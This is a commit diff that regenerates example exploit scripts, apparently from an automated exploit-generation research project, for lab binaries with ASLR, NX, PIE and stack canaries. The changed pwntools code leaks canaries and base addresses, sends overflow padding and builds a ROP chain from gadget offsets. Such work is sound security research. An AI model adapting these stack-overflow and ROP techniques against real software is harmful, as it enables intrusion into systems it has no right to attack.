examples: regenerated exploit scripts (2022/02/06)

aesophor · aesophor · commit 7ce2134157f8 · 2022-02-06T13:21:46.000+08:00
Signed-off-by: Marco Wang &lt;m.aesophor@gmail.com&gt;
diff --git a/examples/aslr-nx-canary/exploit_2.py b/examples/aslr-nx-canary/exploit_2.py
@@ -33,6 +33,7 @@ def solve_stage1(canary, elf_base, iostates) -> bytes:
     proc.recv(25)
     canary = u64(b'\x00' + proc.recv(7))
     log.info('leaked canary: {}'.format(hex(canary)))
+    proc.recvrepeat(0.1)
 
     # input state (offset = 1024)
     # input state (rop chain begin)
diff --git a/examples/aslr-nx-pie-canary/exploit_9.py b/examples/aslr-nx-pie-canary/exploit_9.py
@@ -3,14 +3,14 @@
 context.update(arch = 'amd64', os = 'linux', log_level = 'info')
 
 elf = ELF('target', checksec=False)
-__libc_csu_init = 0x1260
+__libc_csu_init = 0x1270
 __libc_csu_init_call_target = 0x4888
-__libc_csu_init_gadget1 = 0x12b6
-__libc_csu_init_gadget2 = 0x12a0
+__libc_csu_init_gadget1 = 0x12c6
+__libc_csu_init_gadget2 = 0x12b0
 canary = 0x0
 elf_base = 0x0
 pivot_dest = 0x4850
-pop_rsi_pop_r15_ret = 0x12c1
+pop_rsi_pop_r15_ret = 0x12d1
 
 def solve_stage1(canary, elf_base, iostates) -> bytes:
     os.system('./launch-crax.sh -c {} -e {} -s {}'.format(hex(canary), hex(elf_base), iostates))
@@ -28,24 +28,20 @@ def solve_stage1(canary, elf_base, iostates) -> bytes:
 
     # output state
     # leaking: canary
-    proc.recv(25)
+    proc.recv(32)
     canary = u64(b'\x00' + proc.recv(7))
     log.info('leaked canary: {}'.format(hex(canary)))
-
-    # output state
     proc.recvrepeat(0.1)
 
     # input state (offset = 72)
     proc.send(b'\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41')
 
     # output state
     # leaking: code
-    proc.recv(72)
+    proc.recv(99)
     elf_leak = u64(proc.recv(6).ljust(8, b'\x00'))
-    elf_base = elf_leak - 0x1179
+    elf_base = elf_leak - 0x1169
     log.info('leaked elf_base: {}'.format(hex(elf_base)))
-
-    # output state
     proc.recvrepeat(0.1)
 
     # input state (offset = 48), skipped
@@ -54,7 +50,7 @@ def solve_stage1(canary, elf_base, iostates) -> bytes:
 
     # input state (offset = 48)
     # input state (rop chain begin)
-    payload  = solve_stage1(canary, elf_base, 'o,i25,o25,o,i72,o72,o,i48,i48,i48')[97:193]
+    payload  = solve_stage1(canary, elf_base, 'o,i25,o32,i72,o99,i48,i48,i48')[97:193]
     proc.send(payload)
     time.sleep(0.2)
 
@@ -188,7 +184,7 @@ def solve_stage1(canary, elf_base, iostates) -> bytes:
     payload += p64(0x4141414141414141)
     payload += p64(0x4141414141414141)
     payload += p64(0x4141414141414141)
-    payload += p64(elf_base + 0x12c3)
+    payload += p64(elf_base + 0x12d3)
     payload += p64(elf_base + elf.bss())
     payload += p64(elf_base + elf.sym['read'])
     proc.send(payload)
diff --git a/examples/aslr-nx-pie/exploit_2.py b/examples/aslr-nx-pie/exploit_2.py
@@ -32,6 +32,7 @@ def solve_stage1(canary, elf_base, iostates) -> bytes:
     elf_leak = u64(proc.recv(6).ljust(8, b'\x00'))
     elf_base = elf_leak - 0x1159
     log.info('leaked elf_base: {}'.format(hex(elf_base)))
+    proc.recvrepeat(0.1)
 
     # input state (offset = 128)
     proc.send(b'\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41')
